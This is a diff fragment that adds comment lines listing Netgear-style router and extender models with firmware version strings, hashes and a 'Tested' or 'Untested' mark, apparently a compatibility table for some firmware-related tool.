+# EX3800 V1.0.0.44_1.0.22 30323764937bae52d93184f3b521783a Untested
+# EX3800 V1.0.0.34_1.0.22 37c8368144211c8f73d7be9a9f6dacb2 Untested
+# EX3800 V1.0.0.28_1.0.20 d7e6b85d140f09f08ce3129dc88918c2 Untested
+# EX3800 V1.0.0.26_1.0.19 bc0c9df4ed9424c0d3b94bf78db594c0 Untested
+# EX3920 V1.0.0.78_1.0.51 456b1fdd776007c0999a6b5cc85ea4e0 Untested
+# EX3920 V1.0.0.76_1.0.49 cd4e4e9179569fafa3c406cf48d4ee2c Untested
+# EX3920 V1.0.0.72_1.0.47 3556b3a666c781dbed7d6d6304ae34b5 Untested
+# EX3920 V1.0.0.70_1.0.46 a0e1573c0e8dbd9ae43ab07e1e4bddd7 Untested
+# EX3920 V1.0.0.68_1.0.45 d26b6062d6e75fee8109e67572cdcc26 Untested
+# EX3920 V1.0.0.64_1.0.43 d665edd51692e539592b5e1667eef22c Untested
+# EX3920 V1.0.0.62_1.0.42 9e753ac547229b6a3df28f03115a8d31 Untested
+# EX3920 V1.0.0.58_1.0.38 67ab1cac6cbf6d074cea95fadca461ab Untested
+# EX3920 V1.0.0.50_1.0.30 26bf966c3dc6143f126ccc6d4e016b0b Untested
+# EX3920 V1.0.0.48_1.0.28 df8012bd7cf20db8592aaacf6b634691 Untested
+# EX3920 V1.0.0.46_1.0.26 e9416497850099b1f851d52bbb5f520c Untested
+# EX3920 V1.0.0.44_1.0.22 30323764937bae52d93184f3b521783a Untested
+# EX3920 V1.0.0.34_1.0.22 37c8368144211c8f73d7be9a9f6dacb2 Untested
+# EX3920 V1.0.0.28_1.0.20 d7e6b85d140f09f08ce3129dc88918c2 Untested
+# EX3920 V1.0.0.26_1.0.19 bc0c9df4ed9424c0d3b94bf78db594c0 Untested
+# EX6000 V1.0.0.38_1.0.22 fa48d3a1d76f0141022b70b37a139bfb Untested
+# EX6000 V1.0.0.32_1.0.18 b119eb091db312c9223291cc12608bc4 Untested
+# EX6000 V1.0.0.30_1.0.17 a4988eb60c3b548c8117ff79a4e0601e Untested
+# EX6000 V1.0.0.28_1.0.16 dc2b1eb141909690af81ef5690cc5912 Untested
+# EX6000 V1.0.0.24_1.0.14 26077a4cdaf21b6ba0d886ea070ce8d7 Untested
+# EX6000 V1.0.0.20_1.0.11 f17de59371f715b6735f0f7f8c9042e9 Untested
+# EX6000 V1.0.0.10_1.0.6 e507e02386a634b092be4a5e2118e7b1 Untested
+# EX6100 V1.0.2.24_1.1.134 6fde4f0259baeb6a3680fb9796b920ab Tested
+# EX6100 V1.0.2.18_1.1.131 5baa9a7007dff6000bf143231e8f43ce Untested
+# EX6100 V1.0.2.16_1.1.130 ee1efa975138f748fbbb21a450b956a9 Untested
+# EX6100 V1.0.2.6_1.1.120 f5a6e0de947f281261b0078fa306e631 Untested
+# EX6100 V1.0.1.36_1.0.114 a1b3591183bc3f75dc280f0565b2c2c9 Untested
+# EX6100 V1.0.0.28_1.0.66 7a39f661c1c6e7f3168dd9e805283f12 Tested
+# EX6100 V1.0.0.22_1.0.51 0bb3870ff95764b2cd600c673d81af8e Untested
+# EX6120 V1.0.0.48_1.0.30 e05613c38204f66c1c8003f5ec4bde0d Untested
+# EX6120 V1.0.0.46_1.0.29 46a4c7f6f054665bed444c2f536b7bf0 Untested
+# EX6120 V1.0.0.42_1.0.27 ddbaa705a3e54cf361735c559e500494 Untested
+# EX6120 V1.0.0.40_1.0.25 9d6ad5117207ffeda165dea3f9bb4f73 Untested
+# EX6120 V1.0.0.36_1.0.23 cfdfa436b024e95d53630fd71f46c48e Untested
+# EX6120 V1.0.0.32_1.0.21 58866ce4c45337157d573d904e2a4052 Untested
+# EX6120 V1.0.0.30_1.0.20 817c93296f8149f6a8e41ef501918509 Untested
+# EX6120 V1.0.0.28_1.0.18 feb144c0a06e2251647ff8a8bb88704b Untested
+# EX6120 V1.0.0.26_1.0.16 90c4e8c9ef5c03e09989caf944a80cf3 Untested
+# EX6120 V1.0.0.16_1.0.11 8f388e0ee15e32f9b7ee46d49d8e9ea2 Untested
+# EX6120 V1.0.0.14_1.0.10 b6e59d1ef530c60a9ba03b8b28784cca Untested
+# EX6120 V1.0.0.8_1.0.4 be69b611410dee663ca081d23e56cc9b Untested
+# EX6120 V1.0.0.4_1.0.2 368cbc774798fb5233f82cb02277213b Untested
+# EX6130 V1.0.0.30_1.0.17 947f815e4a2fe0678e7dd67c4b10cc99 Untested
+# EX6130 V1.0.0.28_1.0.16 20db4ec9dfa72f0a3a6e5574b5663cb7 Untested
+# EX6130 V1.0.0.24_1.0.14 355fe4afe7c8c017ed8048f39e3ad1e3 Untested
+# EX6130 V1.0.0.22_1.0.13 6b87f60aa1ea4c6d9d44f2e8f32fc2aa Untested
+# EX6130 V1.0.0.20_1.0.12 428b183f162edddacb3c4d4da0a2ecd6 Untested
+# EX6130 V1.0.0.16_1.0.10 ede8953a631f5315085bfcbc50ac0534 Untested
+# EX6130 V1.0.0.12_1.0.7 a1485ffd1b0afa2430c8ceb860fd12c8 Untested
+# EX6150 V1.0.0.42_1.0.73 f826bb5b4850ec73c3c5522db0d9f3bb Untested
+# EX6150 V1.0.0.34_1.0.69 ff4a9ac154f6dc5c58d8ee72c847d6dc Untested
+# EX6150 V1.0.0.32_1.0.68 baf6e6074326d8da71b5e81d59fd2bbc Untested
+# EX6150 V1.0.0.28_1.0.64 4209003e1c1c481ad66679918ccefd41 Untested
+# EX6150 V1.0.0.16_1.0.58 56f1fa5cddc9a714796fd671e95d12ce Untested
+# EX6150 V1.0.0.14_1.0.54 067b3adcde96e80e0bcc11ed9c846459 Untested
+# EX6200 V1.0.3.90_1.1.125 884de197aa849e668ac7810561e92265 Untested
+# EX6200 V1.0.3.88_1.1.123 6c183bb1b9b025cb30496dee0d9ab473 Untested
+# EX6200 V1.0.3.82_1.1.117 91e4f5f7fd02adb693b79572a2f887a0 Untested
+# EX6200 V1.0.3.76_1.1.111 c20025474fb29a28dc45e7b2c4566421 Untested
+# EX6200 V1.0.3.74_1.1.109 c7e0ea632820e9674165190d2f7d8a57 Untested
+# EX6200 V1.0.3.68_1.1.104 4fce79801c0ad403df3d627c0d3cc290 Untested
+# EX6200 V1.0.1.60_1.1.98 49b23634828219d28739195b491749de Untested
+# EX6200 V1.0.0.52_1.1.90 dc12bb1fb624fd72625f951d829c84be Untested
+# EX6200 V1.0.0.46_1.1.70 49b158f381a21555d0c715c6e7c33d64 Untested
+# EX6200 V1.0.0.42_1.1.57 4024cd22371a955861589cfdca67014d Untested
+# EX6200 V1.0.0.38_1.1.52 2e6e9debfe5b93d54e18ec8f04a43480 Untested
+# EX6920 V1.0.0.40_1.0.25 9d6ad5117207ffeda165dea3f9bb4f73 Untested
+# EX6920 V1.0.0.36_1.0.23 cfdfa436b024e95d53630fd71f46c48e Untested
+# EX6920 V1.0.0.32_1.0.21 58866ce4c45337157d573d904e2a4052 Untested
+# EX6920 V1.0.0.30_1.0.20 817c93296f8149f6a8e41ef501918509 Untested
+# EX6920 V1.0.0.28_1.0.18 feb144c0a06e2251647ff8a8bb88704b Untested
+# EX6920 V1.0.0.26_1.0.16 90c4e8c9ef5c03e09989caf944a80cf3 Untested
+# EX6920 V1.0.0.16_1.0.11 8f388e0ee15e32f9b7ee46d49d8e9ea2 Untested
+# EX6920 V1.0.0.14_1.0.10 b6e59d1ef530c60a9ba03b8b28784cca Untested
+# EX6920 V1.0.0.8_1.0.4 be69b611410dee663ca081d23e56cc9b Untested
+# EX6920 V1.0.0.4_1.0.2 368cbc774798fb5233f82cb02277213b Untested
+# EX7000 V1.0.1.84_1.0.148 769b68e697516fd40645e85266276844 Untested
+# EX7000 V1.0.1.80_1.0.144 df02a32c3e8dfe22a0e10adf8f9cfa9d Untested
+# EX7000 V1.0.1.78_1.0.140 cf3939b5cd5f3379084c164f0ab85ea5 Untested
+# EX7000 V1.0.0.66_1.0.126 13ddf3f666fe43a4c988babf54861292 Untested
+# EX7000 V1.0.0.62_1.0.122 ce6c2f13b057873db9fec0f7fdc86b5b Untested
+# EX7000 V1.0.0.58_1.0.112 0b988da5188b0c2712a8414f34f68152 Untested
+# EX7000 V1.0.0.56_1.0.108 40ce1aadf9810780d9b9d1cc6dd27a29 Untested
+# EX7000 V1.0.0.50_1.0.102 f862e5ae2823f9187580796c90dd388b Untested
+# EX7000 V1.0.0.42_1.0.94 be8bd31d14825930b8f6f9e4005b436e Untested
+# EX7000 V1.0.0.38_1.0.91 04c5f1f03a3ed1491519c450e73a30df Untested
+# EX7000 V1.0.0.36_1.0.88 ed80bd32dc66f080d962295130c7665c Untested
+# EX7000 V1.0.0.32_1.0.84 00376a5055221c56217a93e41a5ef9c9 Untested
+# EX7000 V1.0.0.30_1.0.72 e182cad2e1d3bfbc33142141958e62f5 Untested
+# LG2200D V1.0.0.57_1.0.40 c788662b93484b512c97147f5e008ff9 Untested
+# MBM621 V1.1.3 4ac9ddde0b40da6b2f8c9e66d7cb3560 Untested
+# MBR624GU V6.01.30.64WW 367530253434926de55988a08e517828 Untested
+# MBR624GU V6.01.30.61WW 7319b8c9ca2335024693e4f6ad02dfb1 Untested
+# MBR624GU V6.01.30.59WW 6a78396265425537f2b15473d7f4fff6 Untested
+# MBR624GU V6.01.30.59NA e4d0ec49da0956cc8b0fb7ff9461be4f Untested
+# MBR624GU V6.00.30.46WW 6f984aa8e172204310226fdee94ab938 Untested
+# MBR624GU V6.00.28.43WW e10b0ab92c8edc94975b345a102ef145 Untested
+# MBR624GU V6.00.28.43NA 5c3e39fed6d914a836c99c397b3f1ec1 Untested
+# MBR624GU V6.00.26.21WW ab6b6f1635dc27a6a93c5f172496286a Untested
+# MBR624GU V6.00.22.14NA bafc32d9dc20f686f3162b263f391df6 Untested
+# MBR624GU V6.00.22.12 7fe0d93833ffe7f74bc829e1054c8312 Untested
+# MBR1200 V1.2.2.53 3ed99932142ee830544022ed0582e1d1 Untested
+# MBR1515 V1.2.2.68 623d9ee0386c50c122fce6f3d6497c94 Untested
+# MBR1516 V1.2.2.84BM cbf78bd7d7ee6c7a3a5375ae6dc07cec Untested
+# MBRN3000 V1.0.0.74_2.0.12WW d496c9abe19b706d688fe11f9d48244f Untested
+# MBRN3000 V1.0.0.72_2.0.12WW 0e5c04a9053070fbe09501ebd45148fb Untested
+# MBRN3000 V1.0.0.72_2.0.12NA f5166bb95613b2c32d4a22b31adea533 Untested
+# MBRN3000 V1.0.0.69_2.0.12WW 621647d9b23d6484c11d35ba8b28fc41 Untested
+# MBRN3000 V1.0.0.69_2.0.12NA df4a8e61a3573f08e0f7e3c3a4925d45 Untested
+# MBRN3000 V1.0.0.65_2.0.12WW 73f3a1d64c334e947cb5ca1f39f69301 Untested
+# MBRN3000 V1.0.0.65_2.0.12NA d3ba7bcc00b3d09a72e0b1992c3fcdc4 Untested
+# MBRN3000 V1.0.0.43NA cad281cfc42d26ffd88762d24074577b Untested
+# MVBR1210C V1.2.0.35BM b36a65b43d84f12254ead93484e64691 Untested
+# R4500 V1.0.0.4_1.0.3 eb878ea3ee999ebd2697d3a1ea6844b0 Untested
+# R6200 V1.0.1.58_1.0.44 c5eb9a42ecad8deb05cdcfbba948489e Untested
+# R6200 V1.0.1.56_1.0.43 b9ba700570eece0317d2d7e6f69375b1 Untested
+# R6200 V1.0.1.52_1.0.41 d6fd17a8d8dec0cd65f85cf3b423b618 Untested
+# R6200 V1.0.1.48_1.0.37 ba22d5de1d45e7b27ef02b54d76109c1 Untested
+# R6200 V1.0.1.46_1.0.36 3b5ac031b2756daf2a22879750887491 Untested
+# R6200 V1.0.0.28_1.0.24 32748ac05aed521902cdc94c79a9c7d0 Untested
+# R6200 V1.0.0.18_1.0.18 b1e6175e31617dad54a2ebbdc0a0df6c Untested
+# R6200v2 V1.0.3.12_10.1.11 0b0df46df490bb452369a8b2a8075039 Untested
+# R6200v2 V1.0.3.10_10.1.10 8baf6ea213db77e77888566ceeb39ac1 Untested
+# R6200v2 V1.0.1.20_1.0.18 e11bba1b0c9d7c882da165188d16a83b Untested
+# R6200v2 V1.0.1.18_1.0.17 5b11e221cee499d20a0615461622ac79 Untested
+# R6200v2 V1.0.1.16_1.0.15 b507812655353cc7ea1c95da7816f820 Untested
+# R6200v2 V1.0.1.14_1.0.14 5076ce08e5bcaba94e510213e59bfff3 Untested
+# R6250 V1.0.4.38_10.1.30 c84cc113aae5aa5a8e540898bda5bd5f Untested
+# R6250 V1.0.4.36_10.1.30 216a9f879e881b5ae467790761c87ebd Tested
+# R6250 V1.0.4.34_10.1.28 0dc8a4bab30dbbe4d8afcfcb360187ad Untested
+# R6250 V1.0.4.26_10.1.23 3f1be99b50d35864d70d2aee5ecc33c6 Untested
+# R6250 V1.0.4.20_10.1.20 2403a8ce4d04a584b19f0cf30f92bf56 Untested
+# R6250 V1.0.4.16_10.1.18 fe6030d67f0a055903e55d405cb91e20 Untested
+# R6250 V1.0.4.14_10.1.17 e0dc56338e8f16c1c38c0845291dafda Untested
+# R6250 V1.0.4.12_10.1.15 0bc26be95cded31e5453d482085e723c Untested
+# R6250 V1.0.4.8_10.1.13 8424c65f442d90638a6d0fc9bcf83d35 Untested
+# R6250 V1.0.4.6_10.1.12 356b523cb24085686b65769e1872a583 Untested
+# R6250 V1.0.4.2_10.1.10 4f119505aa1ad2c66db91ee74693442a Untested
+# R6250 V1.0.3.12_10.1.8 c5ae345bf1d4b790df115ce17a1e2629 Untested
+# R6250 V1.0.3.6_10.1.3 309fefe7f4c6e451adca8339107e3794 Untested
+# R6250 V1.0.1.84_1.0.78 7dfdbdc609b182d6923f486f4d9c5283 Tested
+# R6250 V1.0.1.82_1.0.77 d3cb80a6d4e32ac12a6ca996860179c7 Untested
+# R6250 V1.0.1.80_1.0.75 cb32448faaa7dfc9031e82a80e3c6366 Untested
+# R6250 V1.0.0.72_1.0.71 e8870c350aa8b1831de04528313b4597 Untested
+# R6250 V1.0.0.70_1.0.70 8da51e46e4a0c8ce73b07afbcd4580f3 Untested
+# R6250 V1.0.0.62_1.0.62 c086bcb2c79cf35f4369cf6a99f1c8a5 Untested
+# R6300 V1.0.2.80_1.0.59 5fc46dc531417ecd3a45c7fbe23b2c99 Untested
+# R6300 V1.0.2.78_1.0.58 ae302b1749a6d3462aa218c71b319ec4 Untested
+# R6300 V1.0.2.76_1.0.57 a613643bbce2cec3c79f8f5896de9d9d Untested
+# R6300 V1.0.2.70_1.0.50 43075b37dd29c100d412ef91bc26130e Untested
+# R6300 V1.0.2.68_1.0.49 647341220a8706d9dc7c6023a7520f6e Untested
+# R6300 V1.0.2.38_1.0.33 937ad68339a92c3672b205d26b29f348 Untested
+# R6300 V1.0.2.36_1.0.28 9cceb9d7c494c68304babd23fda58a13 Untested
+# R6300 V1.0.2.26_1.0.26 f44aba5cddc36eedebb08a74b40793db Untested
+# R6300 V1.0.2.14_1.0.23 d9ce4aca0e55a0777083351958ad939c Untested
+# R6300 V1.0.2.10_1.0.21 f8ae0c63ea66511e3f8e006d44236e5c Untested
+# R6300 V1.0.0.90_1.0.18 87bb9b3375847616e30db052708b8442 Untested
+# R6300 V1.0.0.68_1.0.16 f6276b5a3a319c423cb0bf6578098775 Untested
+# R6300v2 V1.0.4.36_10.0.93 ad739a306344ba53c23dcec60b1f25ec Untested
+# R6300v2 V1.0.4.34_10.0.92 e493f182ecd746d3de18df040a95211a Untested
+# R6300v2 V1.0.4.32_10.0.91 0842fa456950808a355edb18795112b6 Tested
+# R6300v2 V1.0.4.28_10.0.89 f4ae7abd7bff63b66f096255e4c428ca Untested
+# R6300v2 V1.0.4.24_10.0.87 e05be33f9f55986c8f606be892fffc69 Untested
+# R6300v2 V1.0.4.8_10.0.77 d6c9b72c67535e159ea7af739cd07926 Untested
+# R6300v2 V1.0.4.6_10.0.76 a3d4fe0c8e7cd91a40724e9c7464fdf6 Untested
+# R6300v2 V1.0.4.2_10.0.74 00f2196125d61b53ffd16dccaa7fde83 Untested
+# R6300v2 V1.0.3.30_10.0.73 00c15e4a4cde88faaf3875914f959a2d Untested
+# R6300v2 V1.0.3.28_10.0.71 cdb52e60dc2aaf5ca0944131451bad70 Untested
+# R6300v2 V1.0.3.26_10.0.70 3c05bff70e44fa9458739e260d3cb647 Untested
+# R6300v2 V1.0.3.22_10.0.67 6cda020fed0ae522671c15f7620c531f Untested
+# R6300v2 V1.0.3.8_1.0.60 69637d313345d7d73d8f853ef2cac2b4 Tested
+# R6300v2 V1.0.3.6_1.0.63CH 2871ac95aea8f1907ab2cce316a6dee9 Tested
+# R6300v2 V1.0.3.2_1.0.57 e127e31093baddeee0b445dfb5b0585c Untested
+# R6300v2 V1.0.2.86_1.0.51 67b4667c4f4d5a46a29bef1a705526ac Untested
+# R6300v2 V1.0.2.72_1.0.46 b1edb9bbc305d22110f9231892784e3d Untested
+# R6300v2 V1.0.1.72_1.0.21 907ce31e0d0c1a81f7f39b152490bb6c Untested
+# R6400 V1.0.1.52_1.0.36 2d9bdc83337eaebd5b0764e4dfbf6615 Untested
+# R6400 V1.0.1.50_1.0.35 82c8c7958cc51705e0388d17494a7e5b Untested
+# R6400 V1.0.1.46_1.0.32 792259674ad727503af277ec1dfaacb1 Untested
+# R6400 V1.0.1.44_1.0.31 eeab43c47589c596a25b8da901c0b986 Tested
+# R6400 V1.0.1.42_1.0.28 f88a6ffd8b267951c1e3acf49041cb29 Untested
+# R6400 V1.0.1.36_1.0.25 fbaea94679a9e93f317fa887b835aacd Tested
+# R6400 V1.0.1.34_1.0.24 d272b88f46a0acd88449250bf7cb40d9 Untested
+# R6400 V1.0.1.26_1.0.19 5c52c2422597a786afe6899afa51fe3f Untested
+# R6400 V1.0.1.24_1.0.18 19e6711c51642615cd8da895bcb4f154 Untested
+# R6400 V1.0.1.22_1.0.17 d790c8858dd1968bb0cbac73e7ae049b Untested
+# R6400 V1.0.1.20_1.0.16 d8620afd06eb83c41350f490de6792df Tested
+# R6400 V1.0.1.18_1.0.15 e98f59224c11fe7b7adbe4d35a2ae024 Untested
+# R6400 V1.0.1.12_1.0.11 7541ede9feaa32df1e20b852f7a230a5 Untested
+# R6400 V1.0.1.6_1.0.4 83ba47279692268739d82a7edfafc1ec Untested
+# R6400 V1.0.0.26_1.0.14 5be5fe81595674f0a11a65982a8cf7e3 Untested
+# R6400 V1.0.0.24_1.0.13 aa8531c26e10e4e4e612ea4a3df3f7c6 Untested
+# R6400 V1.0.0.20_1.0.11 f320cf859f20f3faab341b47d570740e Untested
+# R6400 V1.0.0.14_1.0.8 b66455bd7c21a54682e9987fa662ec35 Untested
+# R6400v2 V1.0.4.84_10.0.58 25c0a4081adf5ff142074fd0d8014ac7 Untested
+# R6400v2 V1.0.4.82_10.0.57 234bdb2fe2d358fa4dbce974ca98d8b0 Untested
+# R6400v2 V1.0.4.78_10.0.55 c7dad31adf2562df42d1b020a56ab630 Untested
+# R6400v2 V1.0.3.66_10.0.50 585dedb8fa86d0d8f6a4efb5591c501d Untested
+# R6400v2 V1.0.2.66_10.0.48 43d36ce5d516a6121adff6aec8f5a7c7 Untested
+# R6400v2 V1.0.2.62_10.0.46 11aa8cceef3708d911cb4b2919fe396a Untested
+# R6400v2 V1.0.2.60_10.0.44 4e73683b8cfaaadac6b0c9a2b5fe81d1 Untested
+# R6400v2 V1.0.2.56_10.0.42 c0bd191a5c021607b9c4627734943cd5 Untested
+# R6400v2 V1.0.2.52_1.0.39 73e31c6da5db634d58245169c430ab4e Untested
+# R6400v2 V1.0.2.50_1.0.38 d3a9a3d8d1cad0836ceb36c50eda2dbb Untested
+# R6400v2 V1.0.2.46_1.0.36 5ac0b9b42dc3be8f1fe67a4ea50d766e Untested
+# R6400v2 V1.0.2.44_1.0.35 a29a8290d6f451aa23db9cc132c8bb13 Untested
+# R6400v2 V1.0.2.34_1.0.22 d609534b475f848709b5957bf65853d7 Untested
+# R6400v2 V1.0.2.32_1.0.20 791b103a3798b00e844007520f0ef10b Untested
+# R6400v2 V1.0.2.14_1.0.7 f707aab369ee4a0358084f8732df4427 Untested
+# R6700 V1.0.2.8_10.0.53 0aa39d2e46c1597da2ef91894bb016e2 Untested
+# R6700 V1.0.2.6_10.0.52 0a9041cc202ca71633f6fd5b15d621ef Untested
+# R6700 V1.0.1.48_10.0.46 f9856946d2b2d60ac72149f3db34bd18 Untested
+# R6700 V1.0.1.46_10.0.45 60fbfa7d196f3262b1d5c7f2388815fb Untested
+# R6700 V1.0.1.44_10.0.44 b034da1c05b9e0e76d980808457b9f7b Untested
+# R6700 V1.0.1.36_10.0.40 361b453523cd68d1d50f9be9e6affab4 Untested
+# R6700 V1.0.1.32_10.0.38 346a257676872b5322986dd755a26ba0 Untested
+# R6700 V1.0.1.26_10.0.35 d868075504004b20d7788c788a5180b2 Untested
+# R6700 V1.0.1.22_10.0.33 66bc7b05ac8c546f7f896a9829f01adf Untested
+# R6700 V1.0.1.20_10.0.32 43ae34c752dacb9f842947165115568d Untested
+# R6700 V1.0.1.16_10.0.30 56e60ce42c6b4eb204e5c192a3cc7021 Untested
+# R6700 V1.0.1.14_10.0.29 1f8d3fbcc6e12424692ad371fd895b34 Untested
+# R6700 V1.0.0.26_10.0.26 e57c70b7d76855b8df473a8ecc8d4b2c Untested
+# R6700 V1.0.0.24_10.0.18 0a63a44df72c4ad9479df8552c9bdf96 Untested
+# R6700 V1.0.0.2_1.0.1 9990354d0687c8cde7f42aa025eec7c2 Untested
+# R6700v3 V1.0.4.84_10.0.58 25c0a4081adf5ff142074fd0d8014ac7 Untested
+# R6700v3 V1.0.4.82_10.0.57 234bdb2fe2d358fa4dbce974ca98d8b0 Untested
+# R6700v3 V1.0.4.78_10.0.55 c7dad31adf2562df42d1b020a56ab630 Untested
+# R6700v3 V1.0.3.66_10.0.50 585dedb8fa86d0d8f6a4efb5591c501d Untested
+# R6700v3 V1.0.2.66_10.0.48 43d36ce5d516a6121adff6aec8f5a7c7 Untested
+# R6700v3 V1.0.2.62_10.0.46 11aa8cceef3708d911cb4b2919fe396a Untested
+# R6700v3 V1.0.2.60_10.0.44 4e73683b8cfaaadac6b0c9a2b5fe81d1 Untested
+# R6700v3 V1.0.2.56_10.0.42 c0bd191a5c021607b9c4627734943cd5 Untested
+# R6700v3 V1.0.2.52_1.0.39 73e31c6da5db634d58245169c430ab4e Untested
+# R6900 V1.0.2.8_10.0.38 d81bc8a57b9430527fb706d516eed382 Untested
+# R6900 V1.0.2.6_10.0.37 b87b38710ef5977179d503bc9bf66c13 Untested
+# R6900 V1.0.2.4_10.0.35 9e79f7b6256d96609a7a461829d8248e Untested
+# R6900 V1.0.1.48_10.0.30 8784f761ecd1b354649f6cf8c2c5b99f Untested
+# R6900 V1.0.1.46_10.0.29 37400b051afec889ab58b056d5bb3c86 Untested
+# R6900 V1.0.1.44_10.0.28 9784f4edd86b697c94acde2276179de3 Untested
+# R6900 V1.0.1.34_1.0.24 d01623ce7b7493963aa159a60e07fe19 Untested
+# R6900 V1.0.1.28_1.0.21 541352d81d7ce6c70707f858e03d3ad3 Untested
+# R6900 V1.0.1.26_1.0.20 acbcba2cf243924e324e07b625d8f6b9 Untested
+# R6900 V1.0.1.22_1.0.18 01c44643eb33073d5e6ad845227f798a Untested
+# R6900 V1.0.1.20_1.0.17 8c26c3b7f0f24f98acda07da2ccad65e Untested
+# R6900 V1.0.1.16_1.0.15 7e599f7ebee500d6f085f531a6f1e934 Untested
+# R6900 V1.0.1.14_1.0.14 de1af2d6fdc38f2efa7dc19f71110b77 Untested
+# R6900 V1.0.0.4_1.0.10 f7cdbfd458403617025681b9fd545df8 Untested
+# R6900 V1.0.0.2_1.0.2 4f1253f17d5892a6ad139b17f8122d95 Untested
+# R6900P V1.3.1.64_10.1.36 73230b02c8371d16933b86caea3406c8 Untested
+# R6900P V1.3.1.44_10.1.23 c94a81a643471975801c1f65f30fa09e Untested
+# R6900P V1.3.1.26_10.1.3 350a0ce80d8448f89821c84c5c24e77a Untested
+# R6900P V1.3.0.20_10.1.1 57f68b9174f20c1cb9076e893f7c7e3e Untested
+# R6900P V1.3.0.8_1.0.93 72df20b0f868e8fb896dc1c89b2f7c9a Untested
+# R6900P V1.2.0.22_1.0.78 89b5c3b5f8f75715b01eca80d8423adc Untested
+# R6900P V1.0.1.14_1.0.59 8731b6fcf8aa73adec7175c4fa30d623 Untested
+# R6900P V1.0.0.58_1.0.50 d04818c010e0bcfeef910cb8c0bd217e Untested
+# R6900P V1.0.0.46_1.0.30 d2f1f602054a8475aebd563d9373c59c Untested
+# R7000 V1.0.11.100_10.2.100 f39d1a3be29d903a5de78a876a92f247 Tested
+# R7000 V1.0.9.88_10.2.88 1e4a56c9fa6a0b1ddb12c93260aa86b9 Tested
+# R7000 V1.0.9.64_10.2.64 2545e4d62fe606c9235301b13fe51c4a Tested
+# R7000 V1.0.9.60_10.2.60 0c1face67db74dae80477937e375c90f Tested
+# R7000 V1.0.9.42_10.2.44 9db15cdabcb182c5a8c352f4d62240aa Tested
+# R7000 V1.0.9.34_10.2.36 0130c6ef44df28825c34998ec1ed9d28 Tested
+# R7000 V1.0.9.32_10.2.34 d63cc30511ec16eb22aea2ad4536c482 Untested
+# R7000 V1.0.9.28_10.2.32 65fdddb6075d231981d0b0b0b173b957 Untested
+# R7000 V1.0.9.26_10.2.31 e7eb90b86b4cf80fc498a3a2a1cde4b6 Tested
+# R7000 V1.0.9.18_1.2.27 62f58a3b03d2ffe4da6def29dc57fd62 Tested
+# R7000 V1.0.9.14_1.2.25 933a68fd113502dbe5ee5eda56d76c4d Tested
+# R7000 V1.0.9.12_1.2.23 0815e4c5d8bf72f3bc8f8a7c3c5151a5 Tested
+# R7000 V1.0.9.10_1.2.21 89caf1296fb771f6f710fdaa11b1eee4 Tested
+# R7000 V1.0.9.6_1.2.19 5f52c024607204abbe68350fe3da9ff0 Tested
+# R7000 V1.0.8.34_1.2.15 f9472bcb1eea80197f98bd33006666a3 Tested
+# R7000 V1.0.7.12_1.2.5 20358acc1e6eff39e2d6846e76b24cd8 Untested
+# R7000 V1.0.7.10_1.2.3 c555f18db9afc19489e7e986f143d485 Untested
+# R7000 V1.0.7.6_1.1.99 0a49104751389366034a7c88f32197b3 Untested
+# R7000 V1.0.7.2_1.1.93 6d7d94848a91a3e22ff1654411ba09ae Untested
+# R7000 V1.0.5.70_1.1.91 05a4bf0348e03857c7d37910f02f4afe Untested
+# R7000 V1.0.5.64_1.1.88 edfa804fcb57d842ae1ea53544fc790d Untested
+# R7000 V1.0.4.30_1.1.67 c62491d7b5f5ac6a41d4f25d7a4896e2 Untested
+# R7000 V1.0.4.28_1.1.64 60f6118cc800e96ec4156738485a6061 Untested
+# R7000 V1.0.4.18_1.1.52 ee82a3fcaf278597ebeb6bd6a7a436ec Untested
+# R7000 V1.0.3.80_1.1.38 6575261b06aa8a64242f02461530a0fc Untested
+# R7000 V1.0.3.68_1.1.31 d62937f144cbe3cc259d33c70adf1f65 Untested
+# R7000 V1.0.3.60_1.1.27 f36cf1c461b50883d5c001f66f06c324 Untested
+# R7000 V1.0.3.56_1.1.25 2ad107f27a2d3fa6db7787594a5718cd Untested
+# R7000 V1.0.3.24_1.1.20 25d86a5a33cd447aa35120e4fc97ae8e Untested
+# R7000 V1.0.2.194_1.0.15 26fb65524fec001d6ff8cc723d0e863a Untested
+# R7000 V1.0.2.164_1.0.15 b4b75cd7c7fc736ca8d195de6954cdb0 Untested
+# R7000 V1.0.1.22_1.0.15 1e7fbdb154328552e6ae21e106b79d71 Untested
+# R7000 V1.0.0.96_1.0.15 2e25aedb619a9e5520bf8ea9a25d06ac Untested
+# R7000P V1.3.1.64_10.1.36 73230b02c8371d16933b86caea3406c8 Untested
+# R7000P V1.3.1.44_10.1.23 c94a81a643471975801c1f65f30fa09e Untested
+# R7000P V1.3.1.26_10.1.3 350a0ce80d8448f89821c84c5c24e77a Untested
+# R7000P V1.3.0.20_10.1.1 57f68b9174f20c1cb9076e893f7c7e3e Untested
+# R7000P V1.3.0.8_1.0.93 72df20b0f868e8fb896dc1c89b2f7c9a Untested
+# R7000P V1.2.0.22_1.0.78 89b5c3b5f8f75715b01eca80d8423adc Untested
+# R7000P V1.0.1.14_1.0.59 8731b6fcf8aa73adec7175c4fa30d623 Untested
+# R7000P V1.0.0.58_1.0.50 d04818c010e0bcfeef910cb8c0bd217e Untested
+# R7000P V1.0.0.56_1.0.45 e9350d724b176c752f1854d0c93d6197 Untested
+# R7000P V1.0.0.50_1.0.35 02b57178cbc3c931d3f260a544429481 Untested
+# R7000P V1.0.0.46_1.0.30 d2f1f602054a8475aebd563d9373c59c Untested
+# R7000P V1.0.0.44_1.0.27 fa0eee5e0992621c67e3e2ba5aa00515 Untested
+# R7100LG V1.0.0.52_1.0.6 1c8d51be270d926fae37ccb870eb1e1a Untested
+# R7100LG V1.0.0.50_1.0.6 1d7ef2375f5d48946c00c256c68d2c7e Untested
+# R7100LG V1.0.0.48_1.0.6 114fd13cefdf17588004e13240b8e1bf Untested
+# R7100LG V1.0.0.46_1.0.6 f9debfe64d27d0a4e96e7b6a9108363b Untested
+# R7100LG V1.0.0.42_1.0.6 dcb553dfd489154862ac74eba99e7497 Untested
+# R7100LG V1.0.0.40_1.0.6 6bf2fa0bbd5afd33358cf5753477907b Untested
+# R7100LG V1.0.0.38_1.0.6 ee79ad50639af3c4fff83e1638223dff Untested
+# R7100LG V1.0.0.36_1.0.6 1c05d9c779fce01aa42859181382340b Untested
+# R7100LG V1.0.0.34_1.0.6 45fc097ce307749679c46d77cde5a6aa Untested
+# R7100LG V1.0.0.32_1.0.6 b6adb8bc5262870940b410634305d18b Untested
+# R7100LG V1.0.0.30_1.0.6 fb13dc96f7513d2eaef39966b0245c7b Untested
